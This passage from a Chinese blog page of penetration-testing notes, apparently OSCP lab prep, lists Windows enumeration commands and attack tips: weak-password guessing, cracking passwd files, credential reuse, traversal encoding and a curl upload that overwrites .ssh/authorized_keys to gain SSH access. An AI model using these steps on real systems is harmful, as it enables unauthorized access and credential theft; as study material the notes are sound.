<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">dir /s $filename</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">/p表示循环输出，不一次性输出</span></span><br><span class="line">dir /s *.exe /p</span><br><span class="line">tree /f &gt; tree.txt然后搜索tree.txt</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">使用forfiles</span></span><br><span class="line">forfiles /p c:\windows /s /m notepad.exe /c &quot;command you want to execute&quot;</span><br></pre></td></tr></table></figure>

<p>使用whoami查看用户SID，管理员是5000，用户从1001开始</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Users\J0ker&gt; whoami /user</span><br><span class="line"></span><br><span class="line">用户信息</span><br><span class="line">----------------</span><br><span class="line"></span><br><span class="line">用户名                SID</span><br><span class="line">===================== =============================================</span><br><span class="line">desktop-kfa4a5s\j0ker S-1-5-21-2231775247-161512554-3901611509-1001</span><br></pre></td></tr></table></figure>

<p>查看当前用户权限，属于administrator组就有管理员权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whoami /user</span><br></pre></td></tr></table></figure>

<p>查看文件权限，（F）表示所有权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls $fileName</span><br></pre></td></tr></table></figure>

<p>查看运行的所有进程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tasklist</span><br></pre></td></tr></table></figure>

<h2 id="其他思路"><a href="#其他思路" class="headerlink" title="其他思路"></a>其他思路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">记得扫目录中的子目录</span><br><span class="line"></span><br><span class="line">现成的EXP不能用的话，记得看漏洞描述</span><br><span class="line"></span><br><span class="line">弱口令试一下用户名和密码都是用户名，使用su切换用户</span><br><span class="line"></span><br><span class="line">如果是固定的那种系统，可以搜默认账号密码，然后拿默认账号去爆破密码</span><br><span class="line"></span><br><span class="line">一定记得看网页源码</span><br><span class="line"></span><br><span class="line">有时候需要切换到普通用户，再拿root</span><br><span class="line"></span><br><span class="line">文件包含可以读取passwd文件然后破解</span><br><span class="line"></span><br><span class="line">进去有phpmyadmin的系统，找数据库配置文件，拿来密码复用</span><br><span class="line"></span><br><span class="line">记得读取passwd文件然后破解</span><br><span class="line"></span><br><span class="line">如果有文件上传，可以考虑上传一个txt之类的文件到.ssh/authorized_keys上去，然后登录（下面的例子实际上是上传之后用filename参数把上传之后的文件名改了）</span><br><span class="line">ssh-keygen</span><br><span class="line">sudo chmod 600 id_rsa</span><br><span class="line">sudo cp id_rsa.pub id_rsa.txt</span><br><span class="line">curl -i -L -X POST -F file=&quot;@/id_rsa.txt&quot; -F filename=”/home/xxx/.ssh/authorized_keys” http://xxx</span><br><span class="line">sudo ssh -oHostKeyAlgorithms=+ssh-dss alfredo@192.168.185.249 -p 25022 -i /home/sinner/Documents/oscp/id_rsa</span><br><span class="line"></span><br><span class="line">直接访问看不到的，curl有时候可以看到</span><br><span class="line"></span><br><span class="line">文件上传可以考虑覆盖.ssh/authorized_keys</span><br><span class="line"></span><br><span class="line">目录穿越试一下把/编码，就是%2F，或者改成\，就是%5C</span><br><span class="line"></span><br><span class="line">xfreerdp连不上的话机上/cert-ignore</span><br><span class="line">sudo ip l s dev tun0 mtu 1300(非必要)</span><br><span class="line">sudo proxychains xfreerdp /v:172.16.167.200 /u:luiza /timeout:60000</span><br><span class="line">sudo proxychains xfreerdp /v:172.16.119.200 /u:luiza /cert-ignore /timeout:60000</span><br></pre></td></tr></table></figure>

<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><p>内网扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/elddy/NimScan</span><br><span class="line">https://github.com/sh1yan/Lscan</span><br></pre></td></tr></table></figure>

<p>工具网站</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cyberchef</span><br><span class="line">https://gtfobins.github.io</span><br><span class="line">https://book.hacktricks.xyz/</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/yu1e">项目</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">扫描命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH%E5%90%8E%E9%97%A8"><span class="toc-number">2.</span> <span class="toc-text">SSH后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MSF"><span class="toc-number">3.</span> <span class="toc-text">MSF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Meterpreter-Shell"><span class="toc-number">4.</span> <span class="toc-text">Meterpreter Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B7%A8%E5%B9%B3%E5%8F%B0%E7%BC%96%E8%AF%91"><span class="toc-number">5.</span> <span class="toc-text">跨平台编译</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB-Service"><span class="toc-number">6.</span> <span class="toc-text">SMB Service</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8A%A0%E8%A7%A3%E5%AF%86%E7%9B%B8%E5%85%B3"><span class="toc-number">7.</span> <span class="toc-text">字符串加解密相关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%8B%E7%BC%A9%E5%8C%85%E7%A0%B4%E8%A7%A3"><span class="toc-number">8.</span> <span class="toc-text">压缩包破解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">9.</span> <span class="toc-text">渗透常用命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">10.</span> <span class="toc-text">系统常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux"><span class="toc-number">10.1.</span> <span class="toc-text">Linux</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows"><span class="toc-number">10.2.</span> <span class="toc-text">Windows</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%80%9D%E8%B7%AF"><span class="toc-number">11.</span> <span class="toc-text">其他思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7"><span class="toc-number">12.</span> <span class="toc-text">工具</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&text=渗透杂项"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&is_video=false&description=渗透杂项"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透杂项&body=Check out this article: http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&name=渗透杂项&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&t=渗透杂项"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2010-2024
    yu1e
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/yu1e">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
